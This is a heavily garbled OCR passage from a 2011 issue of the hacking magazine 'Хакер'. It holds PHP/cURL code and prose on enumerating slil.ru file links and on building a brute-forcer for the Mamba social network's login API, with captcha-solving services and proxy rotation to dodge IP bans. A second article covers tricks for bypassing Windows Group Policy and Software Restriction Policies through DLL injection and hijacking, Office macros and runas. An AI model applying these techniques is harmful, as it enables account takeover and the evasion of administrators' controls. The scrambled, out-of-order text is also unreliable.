"Accept-Language: en-us,en;q=e.s·,
"Accept-Encoding: gzip, deflate",
"Accept-Charset : IS0-8859-1,utf-8;q=e.7,! ;q=
- e"_,."-7__,
"- " ~__:_кeep-Alive : Зее· ,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
"Connection: keep -alive" _ __
);

01

шапка, которую наш брат получили помощью LiveHПPHeaders на виде массива

curl_setop:t($curl, CURLOPT_URL, " http://sli l . ru/ 014e2491" );
curl_setop:t($curl, CURLOPT RETURNTRANSFER. true);_ _ _ _ _ __
curl_setop:t($curl,_i:URLOPT HПPHEADER,_$jJead);_ _ _ _ __
curl_setopt($curl, CURLOPT_ENc;QDING, "gzip,deflate" );
$out=curl_exec($curl); // создаем связывание
curl_close($curl); // закрываем текуще е конкатенация

Готовый парсер slil.ru

Всего

07 строк стих ,

равно автор имеем первобытный шифр страницы

s l i l. г u/3140 0 091 во переменной
Прежде нежели начертать п ер вые строчки в

cUR L, ну-кася

проанали­

$out . Осталось лишь только

разыскать нужные

нам данные, вместе с ч ем справится сле д ующий скрипт:

зируем, в духе браузер получает страницу. Ведь нам нужно замаски­

роваться как перед браузер. Для сего откроем

Mozilla

Fiгefox равным образом

$filedata=explode(" <p align="center">", $out);
$filedata=explode( "< /p>", $filedata[1]);_
list($filename,_jfilesize)=explode(."_&nbsp;&пbsp:&nbsp;,-"-"~--­
_trim(strip_:!;_qg~($filedata( e]))); __

запустим плагин LiveHTTPHeadeгs. Теперь перейдем по мнению тестовому

адресу s l i l . г u/ 0 0 0 0 0 0 0 0 да погляжу во интервал плагина. Там достаточно бессчетно
логов, с которых нас интересуеттолько самый узловой запрос.

Вот как бы дьявол может выглядеть:

GET /314е2491
Host: slil. ru

$temp_link=explode(" var llnk=\", $cResult);
$temp_link=explode(" \ "; ", $temp_link[1]);
$temp_link=trim(str_replace( ""+"", " , $temp_link[e]));
data=arra (" name" -> $filename, "size" -> $filesize, _ _ _ _ __
"lin k" -> $temp_link);,_ _ _ __

НТТР/1.1

User-Ageпt: [ЮlЕРАГЕНТ]1 _ _ _ _ _ _ _ _ _ _

-----

Accept: textLxml,QpplicatioпLxml,applicatioпLxhtml+xml;g~
As; вместе с ept- L<miO-l<!Ш!_;_gл- us_,eп;_g:;.!l.5
Accept-Eпcodiпg : gzip,deflat_
e
Accept-Charset : IS0-8859-1,utf-8;q=e. 0, *;q=e. 0
Keep-Alive: зее
Соппесtiоп: keep~aliv",
e _ _ __

Таким образом да мы из тобой спарсили имя, размер равно ссылку файла вместе с одной
страницы.

многопоточносты
Но равно как но спарсить враз бессчётно файлов? На сотрудничество приходит много­

поточность cURL"a. Чтобы склонить уймища файлов, нам нужно

Если установленный требование возвращает нужную нам страницу, значит,

кто наделен по образу партминимум избыток ссылок . Дл автор этих строк уборная напишем г енера·

его автор сих строк равным образом будем истощить на качестве маскировки.

т гам диапазона ссылок, исходя с стар т овой да последней ссылки:

СОСТАВЛЕНИЕЗАПРОС

fu nction

Теперьдавай напишем простенький скрипт на получения страницы

0 СЕРВИСАДЛЯ

geпlinks($from,

$to)

_ {______________________

вместе с файлообменника:

РАСПОЗНАВАНИЯ КАПЧИ

Использованиеонлайн­
сервисов дляра спознава ния

0

<<Антигейт»

[ aпtigate . com l-oдин изо

0

<<КапчаБот»

lc aptchabot.coml- аналогич-

0

Death Ьу Captcha

[death Ьуса ptcha .coml- ото но-

капчиоченьпопулярновсерьезных

самых первых и, безусловно, самых

ный, н в отношении в меньшей мере именитый сервис.

сительна последний насчет ект, позицио­

проектах, зачастую основанных получи и распишись

популярных сервисов . Здесьтебе

Точность расшифровки маленько

нирующий себя наравне самого крутого

получении выгоды посему либо — либо иного

не без; удовольствием помогутрасшиф­

слабее

действия. И действительно, на фигища

ровать русские да английские капчи

вает многопоточность на своих

удовольствия-1,39 долл. после

программи ступисатьнейросетии

форматовJРG,

API . Ц ена-30

распознанныхкапч.Среднеевремя

си подевать бессоными ночами следовать кодом,

такоеудовольствиеотносительно

изображение, а срок обработ-

распознаваниясоставляет17секунд

от случая к случаю допускается прямо-таки заплати ть единолично

невысока-1 долл . из-за

ки -до

от точностью 00% да выше. З -де сь твоя милость

густо-зеленый вечно зеленый ради целуютысячу раз­

но ний. Качествотоже сверху уровне-не

гаданныхкапч.Давайрассмотрим

паче

три самых известных равным образом популярных
антикапчевых ресурса:

GIF равным образом PNG. Цена из-за
0000 изобра­

[80 %1, тоже

поддержи­

копеек после одно

00 секу нд . Значительный

распознавателякапчнарынке.Цена

0000

выгода системы- программные

равным образом найдешь целую кучу пр о­

примеры, позволяющие безбо­

граммных решений в целях работающе­

ность умозаключить деньжонки обратно, на

лезненно переплеть услуга во

го в сервисеАРI.

случае кабы тебя в некоторой степени безграмотный устроит.

близкий проект.

00% ошибок, а как и возмож­

ХАКЕР

00 / 053/2011

Парсингпо -к рупному

_ $i=~_$links=arrgy(); _ _ _ __
__fQ_c_($i=e;j i <=(ito- $from);_$iн),_ _ _ _ _ _ __

____ { ________________________________________________
$links[]="http://slil.ru/" .($from+$i);

clickUrl=h tt ~ЗA%2F %2 Fmamba.r u%2Ftips%2F%3 Ft~p%ЗDLogiQ&
target=&logJn_sв_R tcha=&login=xxx&passwor d=x 0 x22QL _______ _
VAnk~t a i q=13&Red i ~ectBack=http%2~~%2 02F%25~Fmamb~

ru%252Findex.phtml%253F

}
return $links;

А д рес API- mamba . гu /aja x/ login . phtmi ?X F o гm=L o g i п .

_}
$JJ!lk s_ .=_ge n~_in!s s (ЗН.~421, JJ4~2 ~ЯJJ; ··--·-·········-·······----

СОСТАВЛЕНИЕЗАПРОС
Те перь всмотримся во самоуправно запрос. Как видим, з десь сделано фигурируют

Теn е рь пишущий сии строки имеем 000 сс ылок s lil . гu от31402491 перед 01402591 во виде

сессии, эт в рассуждении приметно п по части cookie . Та кже автор видим, сколько посылаются дан­

массива . Те п ерь приступим ко самой многопоточно вместе с ти . Е е исполнение

ные, да посылаются они методом РОSТ. В се сии дет а ли нужно учес ть подле

немн что до го труднее, да пользу кого получи и распишись вместе с недостает сносно трудного .

написании брутера.

В cURL"e многопото чно сть вещь етследующим об ра зом:

0.
0.

Те п ер ь вместе с нова открывай ди ск равным образом ищи н а нем очеред н ой около мер нате

Создаем д еск риптор многопоточности, на некоторый позднее крат следовать

РНР + cUR L. Н а настоящий ра з автор д касательно л ж ны п олучить опре д едва-едва нный отчёт ото

разомскладываемнастрое нны е сое динения .

авторизационного API <<Ма м бы», означающий правильнесть сиречь не­

Пр обе г аемся п по отношению д ескри пторуфунк ци ей cuг l _m ul ti_exec, которая

пр а вильность туман << лаги н- движение роль» .

равно как разиисполнитвс iис в один из дней ~

В оттак выгляд итотв ете неправильной туман ой :

0. Для посл е ду ющего обхо д а ре зультатов работы исполь зуе м c uгl _
multi_getcoпteпt .

{ "t" : "еееееееееееее", "а" : ееееееее, "s" :1, "е" : е, "d" : [], "r" : е, "XFor
ms" : { " Login" : { "found" : " \ul341d \ue435 \ue432\ue435\ ue44e\ue4Зd \

За примерам реализа ции таковский схемы пошли н а ди ск да запускаем

ue4Зe\ ue443 \ue4Зa\ ue4Зe\ue437 \ui34Зe\ul343d \ue4Зb\ul343e\ ue433 \

функцию paг se l i п ks ll из л е дующим образом:

ue438 \ue4Зd \ul3438\ue4Зb\ul3438 \ul343f \ ue4Зe\ue44e\ue4Зe\ue4Зb\

ul344c" }}}
$info=parseLinks(genLinks(314132491, 014132591));
А воттак от правильной :
Теперь, послетр ех -ч етыр ех сек у ндработы скри пта, наша сестра имеем инфор­

мацию относительно 0000файлов, сохраненных возьми sli l.гu , вдиапа зо неот3 040 049 0 прежде

{ "t " : "еееееееееееее", "а" :"eeeeeeee", "s" :1, "е" : е , :"d " : [ ] , "r" :

01402591 . Далееужедело фантазии . Можно, например, прои звест равным образом выбор­

.:.ь:ttR%.ЗA%2F %lE_mi!rnh!hrJ!-"...2 E_t i p~%2f..% ЗFJip%ШLogi n " ,.:.хЕо rm s.:":.!H

__ _

ку конкрет ного формата файлов, не грех равно х во се из пошатывать ко себя для компью­
тер по мнению соответствующим ссылкам, не грех сделать отыскание соответственно фра зе да

П озтому будем пересчитывать , ч ведь буде на ответе хорэ рядом сутст во овать

в такой мере далее. Как все еще зывает пр актик а, ни ложки со ложного на этом нет, вследствие чего

от трока

рассмотрим е ще единодержавно прим е р, что будетуже маленько сложнее.

под лад подош л а. Та кже хочу отмети ть , который круглый ко д вместе с ди ска вместе с ледует

"r " : "http%3A%2F%2Fmamba. ru%2Ftips%2F%3Ftip%3DLogin", в таком случае

оберну ть во целый ряд п оточный вариант, хотелось бы на виде функции. Но

УТИМ «МАМБУ»
Дал ее я остановимся получай брутере пользу кого социальной се ти « Мамба >>

безвыгодный буд у п ов торяться , та ко по образу вместе с объединение соб ы р еа ли зации экий мно г по части п оточ­
ности что до п исаны выш е.

l w w w. mamba.гu ).
Как обычно, д авай составим алгорифм работы брутера:

0. По от ылаем требование от лагином равным образом парол ем .
0. Принима ем отвеL
0. Сверяем секс учен ный ответеуже подготовленным ответом << н еудач­
утнапиштим испарения » равно , даже если они одинаковы , возвращаем false, не то возвра­

ПАЛКИ В КОЛЕСА~
Соз д авфункциональныйскрипти пр оверивоколо1000аккаунтовза
минуту, твоя милость можешь удивить ся тому, почто р езу льтаты дале ко безграмотный спокон века

будут корректными. Для сего советую тебе пр осто- напр ос т в рассуждении организовывать изложина
работы , на кто записываются ответы сервера. Открыв т акой л ог, твоя милость

сейчас е м tгue.

уви дишь подобные записи:

Теперьос тановим ся маленько подробн ее в самом механизмеавтори­

{ " t "":.:".1311437340338", "а" : е, "s" :1, "е" : е, "d" : [] , "r" : е, "XForms" : е,"
captcha" :1}

з ации <<М ам бы» . Перейдя бери сайт, наша сестра поглядим для нопоч ку<< В ходьба ». На жав для
безграмотный е, твоя милость никуд а малограмотный пере хо д да шь, а в свою очередь далеко не соз д ается ни каких н об ваш брат х очес н ,

з ато п осередине экрана п оявляется новы й не без; лой от формой ради на аллюр . Из

А та кже записи, свидетельствующие что до бане IР -а дреса , вместе с которого

сие го со ледует, зачем сто итожидатьдва варианта развития событий:либо нас

пусть будет так б р ут. Капча обходится ра зны ми вместе с объединение соба ми lo особенно популяр ­

пе реки в отлучке получи каку ю-то страницу п ос л е ввода нев ерной туман , либо а всi

ных изо ни х моя особа поуже рассказал выше) , а гляди ба н IР -а др еса несомненно починить

сие этому вышел названия реализовано нате Aja x"e вместе с через вн ут ри сайто вого API.

касательно дн ой строкой в cURL :

Первый вариантбыл бы тя жел ее на брутера, таково в качестве кого пришлось бы п о­
л зачать не без; сервера целый ряд м усора да л ишне го html-кoдa , а вотвторой план

curl_setopt($curl, CURLOPT_ PROXY, "12 . 04 . 06.78:8е" );

был бы идеальным, эдак по образу автор павел у ча ем всеголишь 000-300 от имволов с
внутрисайтовогоАРI , нежели ускоряем работубрутера . К нашей радости, нате
<< Мамбе » используется в духе в один из дней втор ой вариант- вместе с АРI.
Д алее нам необ хо димо раскопать адресок сего самого AP I. Искать на html-

Е слирассматриватьпримермногопоточногоскрипта,толуч ш е
ис п ользова ть безграмотный единственный , а мно го прокси, которые б ы автоматом
м е няли сь за павел уче ния ба н а.

равным образом JavaSc г ipt-кoдe, ко нечно, мож н о, однако ты да я будем мудрее равно без труда от нова
используем замеча те льный пл агин пользу кого << Лисы » L ive HTTPHeadeгs .
Открыв со траницу, введя дымка у<<ло гин - п аро ль » равным образом н ажав ко н в рассуждении пк у

ЗАКЛЮЧЕН И
Как будто с практики , усилие от ч ужими балка тами совсе м безвыгодный тр удн а

<< В хо д », наш брат уви д им на окне плагина адресок скри пт а, которы й равным образом отвечает

равно мно ги е ага а архи популярные сервисы безвыгодный очень-то равно стараются на

заправильность/не пр а вильно из тьпары:

ради прикрытие е собс твенны х д а нны х ото грабник би нга . Е от ли, п насчёт п робовав что касается число «пи» са н ­
ные во стат ье от п особы да приобретя соот на е т из тв ующий в рассуждении пы т, твоя милость хоче шь

POST / ajax /login . phtml?XForm=Login НТТР/ 0.1
Host : mamba. ru

монетизировать приманка навыки, так могу намекнуть, который во Н-т усо вк е
определен ны м от оборона сом завсегда п ользавались равно будут п ользова т ься
всевозможные авторегистраторы, спамеры, грабберы, ч екеры равно таково
д алее.

На этом вместе с п е ш у откланяться, удачн по части г касательно п а рсинга! :Х:

ХАКЕР

00/153/ 0011

065

хакинг

Лёша » GreenDog»Tюpин,

DSecRG.ru, Digital Security lagrrrdogragmail.coml

Недостаточно прав?
Достаточно
0ПРИЕМОВДЛЯ
ОБХОДА ГРУППОВЫХ
ПОЛИТИК
МЕНЕ

Не знаю, нежели руководствовалисьлюди изо

Microsoft,

рано или поздно

проектировали да создавали систему групповых политический деятель

во

Windows,

же получилось у них никак не адски . Система по­

лучилась гибкой равно функциональной, же вместе с немалым ко­
личеством лазеек, позволяющих перегнать ограничения равным образом
по головке безграмотный погладить поперед тех мест ОС, посещение ко которым запрещен.

в отношении правде г оворя, групповые п что до литики был равным образом исследованы по-под
равно п оперек уже пятьлет вспять . Однако используемые р е шения
всего ничего нежели изменились . Многи е ба г равно в соответствии с - пр не смертный — змея нем у работают.

Кроме т в рассуждении го , п оявляются новые манеры к обхода гр у пп овых политический деятель .
По этому автор сих строк решили соб ратьдля т ебя н екото рый настройка рец еп тов ,
в надежде ты. во-первых, был в состоянии схватить получи и распишись вооружение, а во-вторы х, пере ста л
поклоняться во т о, зачем групповые политики -это панакея . При во всех отношениях удоб стве
равным образом х исполь зо вания они н е мо г ут обеспечитьдолжный высота защи твоя милость .

Но о на сем соответственно порядку.

ЧТО ЭТО ТАКОЕ?
Е из ли веритьскучным опреде л ениям, в таком случае групповы е политики [или Gгoup
Роliсу)-это эффективны й да концентрированный прибор у правления
многочисленными п а р аме трами что до п ерацио нны х систем равно приложений .

Гр у пп овые политики позволяютадминам пожертвовать правила, на соот­
ветствии из которыми н аст р а иваются п араметр ы рабочей среды какдля

пользователей, таково равно чтобы компьютеров. Пр още говоря, этодовольно мощ­
ныйинструментдляограничениявдействияхобычныхпользователей .
Существуетмасса р азлич ны х п олитик равно прав, со палочка-выручалочка что до щью кото ры х позволяется
после пр е титьвыз ов ди не без; п етче разад ачили р е несомненно кторареес тр~ запре тит ь д о­

сту п для м е эротика << П уск>>, а да порядком пластично об граничитьзапуск программ­

сверху гооб еспечения [зто реализуется из помощьютак для з ыва емых Softwaгe
Restгictioп Policies) . Является ли этотмеханизм эффекти вным ? Лишь
ото части. До сту п ко ш что до рт ката м, запусклевого ПО да систем ны х близ ложений,
направление е н ение для ст р оек- на се э тодостаточнолегко ради пр е щ ае т ся от через

гру пповы х дипломат . да от этой точки зрени ваш покорнейший слуга не грех сказа ть со п асибо раз­
работчикам ОС. Н о, увы, какзто обыч а б ыва ет, зти полит ики зачас т ую
дозволено обой ти . Тут от тоитс выделывать огово рк у. В се политики позволено ра зб ить
получи и распишись двум ко а т е гории-для компав равным образом интересах пользователей. Гру пповы е поли­
тикидоступны наравне во доме н е, приблизительно да получай л ока льном кусок п е. Е сли голос отлично в рассуждении
локальной машине, т по отношению их позволено п осмот р еть после от пециальн ую оснастку

gpedit.msc [secpo l.msc ). В данной от та ть еос н овной акцентсделан то есть
возьми доменны е гру пп овые политики . Итак, пр иступим.

ТРЮК 0. ОБХО

,.._ . . __

TdSk Mdnagcr

что до

~
ь.",...-.ш .

ИМ ЗАГРУЗКУ ПОЛИТИ

Д авай разберемся, в качестве кого во ооб щ е каж дая власть во локальн ой недотка по­

лучает груп п по отношению вас е политики изо хата е нате ? Пр относительно ц есс соз дания гр у пповы х
полити ко м ож хотя ра зб ить для вместе с л е дующие побег ловны е э тапы:

0. А дмин соз дает объектг р упповойпо лити ки.
0. Привя зы ва ет е го ко каки м-т по отношению элемен т ам д омена.
0. Прив хо д е вдом енкомпо тправля е тзапр осна п по отношению л преподавание политики
п олучаетихвответотдомена .

0. При входе п в отношении ль зова т е ля выполня ется тождественный вслед за для с, а поуже
п об п ользова т е ль ским полити кам.

ХАКЕР

066

г

00/153/2011

Недостаточно прав? Достаточно

GJ§(8)

fil? Ut111ty Manager

omJ

Hide

Win+U + Help +Jump to url=По лн оце нн ы й Explorer

Итак, в чем дело? да мы от тобой после этого видим: политики подгружаются получи и распишись стадии входа

Об передвижение ч е рез некорр е кт н ую обработ ко уярлы засада

сейчас неграмотный страшны . Сделать как бы правило- безвыгодный проблема. Даже неравно

во систему. Здесь снедать небольшая фича. По умолчанию перерождение

кто в отсутствии возмож н ости закачать п рограмму н а хает, мож н что до ваша милость п олнить ее

политический деятель выполняется каждые

удаленно !на п ример , вследствие шару! .

0 минут. Но если бы политики невыгодный были

получены нет слов времена входа во систему, в таком случае обновляться они далеко не будут!

Вырисовывается простой способ, на правах зту исключение допускается
ис п ользова т ь:

Увы, опосля сверху нашем пути возникает остальной устройство ограничений­

0. Вынимаем патч-корд с колтун танцевальный шаг .
0. Включаемкомпилогинимсяподсвоейучеткой .
0. П одключаем патч-корд обратно.

SRР ISoftwaгe Restгictioп Policiesl . Это совокупность политик, вместе с через
которыхадмин можетограничитьсписок ПО, которое можетзапускать

пользователь, помощью смоляной равным образом покойник списки.

Blacklist равным образом White list

определяются вместе с через правил , которые можнозадавать несколькими

Даже быть отсутствии доступа во подсак наша сестра сможем взойти во владение , что-то около

способами : объединение зонам равно до сертификатам !первые двум варианта практи­

на правах во даже до тех пор закешировала выше- лаги н равным образом параль !это сотворилось в

чески малограмотный используются!, а как и сообразно пути по файла да соответственно его хеш у. Ото м,

сезон предыдущего входа на систему!. Но сейчас кроме применения груп­

который во системе действуют политики SRP, указываетсоответствующий

повых политик. При зто м да мы из тобой тихонько сможем воспользоваться репертуар

точка на реестре- Н КЕУ_ LOCAL_ МАС Н 0N E\Softwa гe\Policies\M icгosoft\

сети, этак вроде п атч-кор д ко этому моменту довольно бери месте, а со всякими

Wiпdows\Safeг\Code l deпtif i eгs\TгaпspaгeпtEпaЬied со значением ибо л ь ­

авторизациями возьми удаленных ресурсах справится хозяйка винда . Стоит

шим О, который, какуже было сказано повыше , проверяется возле запуске

добавить, зачем на безопасном режиме винды групповые политики во­

процесса . Наша задача, соот ветственно, отсечь эту проверку в недрах

обобщенно неграмотный действуют. Комментарии, моя особа думаю, излишни .

запускаемого процесса . Туся Руссинович lgoo.gi/KNauh l пока что на далеком

0005 годуопубликовал работа на благе об обходе SRP равным образом представилтулзу

РЮК2.КАКПРОИСХО

ИТПРОВЕРКАПОЛИТИК .

Важнопонимат~накакомэтапепроисходитсопоставлениедей­

GPdisaЬie. Она производит DLL-инъекцию во данный процесс, подгру­

жая специальную DL L"кy. Когда дело попытается произвести роль

ствия,котороехочетвыполнитьпользователь,стемиограничениями

ключа реестра НК Е У_ LOCAL_ MACH IN E \Softwaгe\Policies\Micгosoft\

групповых политик, которые н а него накладываются . Сперва давайте

Wiпdows\Safeг\Codeldeпtifiers\T rапsрагепtЕпаЬiеd , так принимать хорош оборона ­

разберемся, идеже расположены политики .

верять пребывание политический деятель SRP, данная читальня перехватитзапрос

Из начально, конечно, сверху контроллере д омена, из каких мест сделано пере­
даются возьми механизмы во локальной сети. После получения групповых
государственный деятель держи клиентской машине они сохраняются на реестре винды на

равным образом вoзвpaтитSTATUS_OBJECT_NAME _ NOT_FOUND. Таким образом, про­

цесс думает, который всегда ОКи SRP политики во системе далеко не действуют.
После покупки компании Sysiпteгпals Майкрософтом GPdisaЬie

следующих -местах lприведены основные ветки ! :

перестал бы л офи ц иаль н насчёт доступным !но его весь п режнему несложно

П оли т ики дл аз многогрешный компа_:__

Утилита GPCu18oг I Ьit.ly/пJAYгi l через Егiс"а Rасhпег·а выполняет а н а­

• H K E Y_ LOCAL_MAC H IN E \Software\Microsoft\Wiп d ows\

логичные фуй н кции, да д осту п возьми во исхо д никах. Что з т касательно нам дает? Мы

Curre п tVersioп\Po li cies\

можем приплюсовать на GPCul8oг любые некоторые значения реестра винды

встретить на Сети I Ьit .ly/ ппzjN9 0. Есть до оный поры побольше продвинутые решения .

• HKEY_LOCAL_MACHIN E\Software\Policies\

IDisaЬieTaskMgг, PгoxySettiпgsPeгUseг ко примеру! равным образом таким образом

П ОЛ ИТИ_кiLД!lJ"I_!!QЛ Ь ЗОf!Ш~Ле~ ;_ ____ _

перегнать весь возможные в отношении г ра н ичения п оли т ик. Какие вот поэтому и есть значения,

• HKEY_CUR ENT-YSEll\Softw a re~Microsoft~Wiпdows~C u rreпtVersioп~_
Policies\
• HKEY_CURENT_USER\Software\Policies\

спросишь ты. Тебе на пособие RegMoп ото Марка Руссиновича, хотя, в области
сути -зто постоянно значения с ветки

Policies .

Дру г ой оригина л ьный от п особ на своем благе об п убликовал Ди д ье

Стивене lgoo.gi/LE1 MO I. Используя еваютупзу bpmtk IBasic Process
Когда запускается какой-то процесс, ведь во нем !то вкушать во
useгspace"el производится проверкада н ных веток реестра !через

Maпipulatioп То о! Kitl, симпатия предложил стоймя во памяти насчет ц есса переменять
значениенеобходимогодлягрупповойполитикиветкиреестра.

по части дг руженную библиотеку advapi .dl ll н а те сиречь некоторые огра н ичения,
которые после кешируются/сохраняются во памяти процесса. Они

ТРЮК4.

п роверяются, когда-когда абонент выполняет какое-то д ействие,

Утилита GPdisaЬie состоит с двух файлов :

BINARY PLANTIN

пример включение П О. В нежели подвох? В том, что-то ко н гном производит­

gpdisaЬie.exe- инъектирует

ся с са страта процесса . То убирать если бы течение << отнюдь не захочеТ>> инспектировать

gрdisаЬiе . dll-специальная DLLдля обхода

DLL на процесс;
SRP.

политики, так ничто его безграмотный заставит их соблюдать. Никакого общего
монитори нг а неграмотный п роизводится! Отсюда вывод: ежели наш брат каким-то
образом сможем пустить вольный процесс, ведь политики нам

Х АКЕР

00 /153/2 011

Как ваш покорный слуга ранее сказал, когда автор можем включить приложение, т по отношению

можем быстро обогнать SRP равным образом иные политики !через GPdisaЬie, bpmtk ,

067

хакинг

-

lllbl!мtlt8W"d..,tl"illlf0"7---·-ь.nprewntedЬo1•..n-•t8JЬktlllnpaky. Par-.~CII*1
E-*~OfC"Of"Ud)"CU"~~.tar.

Макросы малограмотный nаляте автор этих строк nолитиками

SRP

GPCuiBor- неважно!. Однако на реальной системе может оказа ть ся
безвыгодный приближенно у ж легко включить сии приложения. Но наша сестра можем подгр узить

Обход nолитик посредством Runas

DLL [в томик числе gpdisaЫe.dlll . Тут убирать первенствующий нюанс. Групповые
политики возле запуске ПО могут пр оверять равно DLL"ки, так близ э книга
достаточносильнопадаетпроизводительностьсистемы,потому

за умолчанию каста опция отключена. И да мы из тобой сие можем использовать!

Оченькстатиприходитсянедавнееисследованиеоткомпаниидсгоss

Security I Ьit . ly/ov7EAz ), которое рассказывает касательно новых [достаточно
извращенных, же работающих! методах подгрузки ко правда во процессы .
При ем называется Binary planting [и равно как е го бесподобный npимep­

dll hijacking), рядом е го изучении у меня возникла мысль: «а благодаря чего малограмотный

0. П ереиме н овы ва ем gpdisaЫe.dll на ehTrace .dl l.
0. Создаем папкус именем кyкy.{2E095DDO-AF56-47E4-A099EAC038DECC24} [название любое, подтекстовка послеточки исчезнет!.
0. Кидаем ehTrace .dll во только лишь в чем дело? созданную папку.
0. За х одим на папк у да создаем вслед за тем произвольный документация во Word, Excel или, для
примеру, PDF " кy.

0. Теперь с крываем лишь только что такое? развернутый файл.
0. Соответствующая п ро грамма ложбина жна запуститься. И шибануть
дружно из подгруженной DLL"кoй!

использоватьегодляобходагрупповыхполитик? » . Е слисистема

разрешаетзапуск приложений всего лишь изо белого со число «пи» ска [пускай д аже

0. Все, политики нам малограмотный страшны.

лишь только Word), так сего уж достаточно, дай тебе подложить нашу п о­
лезную DLLдля обхода SRP. Итак, попробуем скрестить dll hijacking ото

ТРЮК5. ИСПОЛЬЗУЕМ ИСКЛЮЧЕНИЯ

п арней изо

Часто не возбраняется привыкать равно лишенный чего подобных ухищрений, разве видеть тонкости

Across равно GPdisaЫe:

политик, на результате ко т орых их образ действий распространяются:
бери программы, запу щ енные через имени учетной вслед за число «пи» си

SYSTEM ;

драйверы равно др угие приложения уровня ядра;
макросы среди документов

ГРУППОВЫЕ ПОЛИТИКИ

Microsoft Office;

программы, написанныедля общей многоязыковой библиотеки

времени выполнения [Common Lan guage Runtime).

В ТОНКИХ КЛИЕНТАХ

Итак, проце ссы oт SYS TEM далеко не контролируются. П е рвы й финтушами:
если бы естьдос т уп для какому-то ПО , запущенномупод такойучеткой , ­
Хочется сызнова текстануть пр касательно т акие системы, во вкусе

Citrix XenApp. Что

сие такое? ХепАрр, когда басить простым языком, сие порядок <<до­

атакуем . Например, нажимаем Win+U - з апускаются <<специальные

потенциал » [лупа равным образом экранная клавиатура) . Utilman.exe lпроцесс << сnе­

ставки>> приложений [хотя этотолько порция функционала) . По сути,

циальных если угодно вместе с тей » ) близ этом запускаетс пишущий эти строки oтSYSTEM. Далее вперед

сие что-тотипа терминального сервера винды, однако в некоторых случаях п ользовате­

тама во << Сnравку » . Онатожедолжна признаваться из нужными привилегиями,

лю до самого сту пнот в отношении лько конкретное прил оже ние. В жизни сие выглядит

круглым счетом какза пущена во контексте процесса от прав а ми

так. П ользовате ль коннектится клиентом ко Citrix-cepвepy- ему

невыгодный самая новая lдо Vista l, так кл икаем п равой кнопкой в синей верхней па­

выводится списокдосту пног касательно ПО. Дал ее Юзеф ер запускает какое-то

нельке << Jumpto url », после этого печатаем <<С:\» равным образом получаем истовый встроен­

использование равно начинает во нем трудиться . Основная фича на том, который

ный

в конечном счете суд приложения выполняется н а Cit r ix-cepвepe. По

проюрдонить первобытный адрес IViewSource) сквозь блокнот, откудадалее

сути, установленный п одход довольно [особенно из тонкими ко ли ентами!, да у него

домчаться впредь до файлов. Или иной вариант-<< добавить» небывалый принтер,

очищать связка косяков вместе с точки зре ния безопасности. Так равно как проц есс - сверху

получив по части пятью а приступ для листингу файлов.

сервере, то, значит, поль зовате люд осту пны по сию пору заряд сервера

lc

учетом пользовательских пр ав, конечно) . Это неграмотный ахти хорошо, приближенно

SYSTEM . Е сли на даже

explorer. Если больше новая, так не запрещается в соответствии с правомуклику втек вместе с техелпа

Др угая интересная категория- макросы в середке д окументов

Microsoft Office. Это страшное д ело. П по отношению пр обуем интересах альфа и омега реализо­

в духе предполагается, зачем у пользователя д что касается л жен бытьдоступ только лишь ко

вать запус ко ПО. Хотя даже если включение заблочен обычными политиками [не

запущенной программе, а н е ко ОС. Что уже хуже, добраться-то накануне самой

SRP), как, скажем , блокировкой диспетчера задач , ведь этотоб х од безграмотный

ОС- малограмотный геморрой . Д аже ежели у самого ПО пропал во озможности объединение вз аимо­

сработает. Но нам -то главное-запустить особенный ехе " шник .

д ейс твию не без; ОС [не т карта <<О ткрыть », <<Сох язвить как» ) , ведь вместе с тандартны е

П оэтому во любом документе сме л по отношению создаем сле д ую щий макрос да про­

потенциал винды однако е щ е работают: нажимаем на Сitгiх-приложении

буем запусти ть е го :

<Ctri+Shi ft+Esc>- нам открываетс аз многогрешный ди из петч ер задач Cit r ix - cep вep a,
сиречь ретроградный выкрик по части раскладке клавиатуры , а оттедова на обложка справки со
возможностью листинга дир ек т орий . Лично моя особа не без; т олкнулся вместе с групповы­
ми политиками особенно во этом контексте- быть взломе

068

Citrix.

Sub GOSHELL()
Shell "C :\windows\system32\regedit.exe" , vbNormalFocus
Eo_d_Sub _ _ _ __

ХАКЕР

00/1 03/2 011

Недостаточно прав? До со таточно

В результате, вроде твоя милость можешь догадаться, пишущий сии строки получаем запущен­

склерозник во них , хотя равным образом тогда могут бытовать проблемы . Так в качестве кого получай самом деле

ный ехе. Хардконный схема предложил заново а Дидь е Стивене

власть возьми переписывание у поль зователя есть- за дефолту во папку C:\windows\

l goo . g l /kSPKЗ ). Используя на макросе MS Excel функции ViгtuaiAIIoc,

system32\spooi\Pгinteгs равно C:\windows\temp. Если у пользователя хорэ

WгitePгocessMemoгy да CгeateThгead, дьявол сумел подложить шеллкод

способ выводить во какой-то указатель из софтом, то, считай, соответ­

с макроса на парамнезия процесса. Д а нный ш еллкод подгр ужает DLL"кy

ствующие Политики

на реминисценция процесса , а DLL"кa- безвыгодный который иное, во вкусе cmd.exe. Кстати, ее

практике сообщить , какие у пользователя принимать права, поможеттулза­

исходникивзяты изо проекта

AccessChk через совершенно того но Руссиновича l goo . gi/Ю9tt ).

ReactOS. Как автор поуже сказал, SRP может

SRP сделано неграмотный сработают. Кстати, на того в надежде возьми

противиться запуску DLL"eк !хотя равным образом безвыгодный делает сего в области умолчанию),

РЮК7. ИСПОЛЬЗУЕМ

а когда подгрузку библиотек осуществлять, используя функцию
LoadlibгaгyEx со

РУГОГО ПОЛЬЗОВАТЕЛЯ

Есть сноровка неграмотный подложиться подгрузки политик, же для того сего три ка нам

LOAO _ IGNORE_COOE_AUTHZ_LEVEL где бы

Loadlibгaгy, в таком случае инспекция получи аксессуар подгр ужаемой dll ко

в области надобятся лаги н равным образом парольдругого поль зователя. Суть на том, ась? нам

white-лиcтy малограмотный происходит!

требуется зайти на систему <<е щ е раз», да отнюдь не подо собой. Тут двоечка варианта :

0. <Shift> + справедливый

РЮК6. ИСПОЛЬЗУЕМ ПЕРЕМЕННЫЕ СРЕ

Ы

разблюдник выбираем

Когда начинаешь терзать групповые политики, в таком случае приходит осознание,

зов для запускаемом файле, дальше на контекстном

<< Run as ... >>.

0. Через облигация возьми бираем команду: гunas/nopгofile <название

почто с целью создания защищенной системы nотребуется попотеть. Дело

ехе -ф айла>.

трудное да из большим числом тонкостей. Например, разработчики
Другой пользователь, перед которым твоя милость запускаешь программку,

предлагают админам пускать в дело комфортабельный хи нт-указывать пере­

SRP. Д а смотри тогда

по образу равным образом ты, может фигурировать обычным пользователем со ограниче нными пра ­

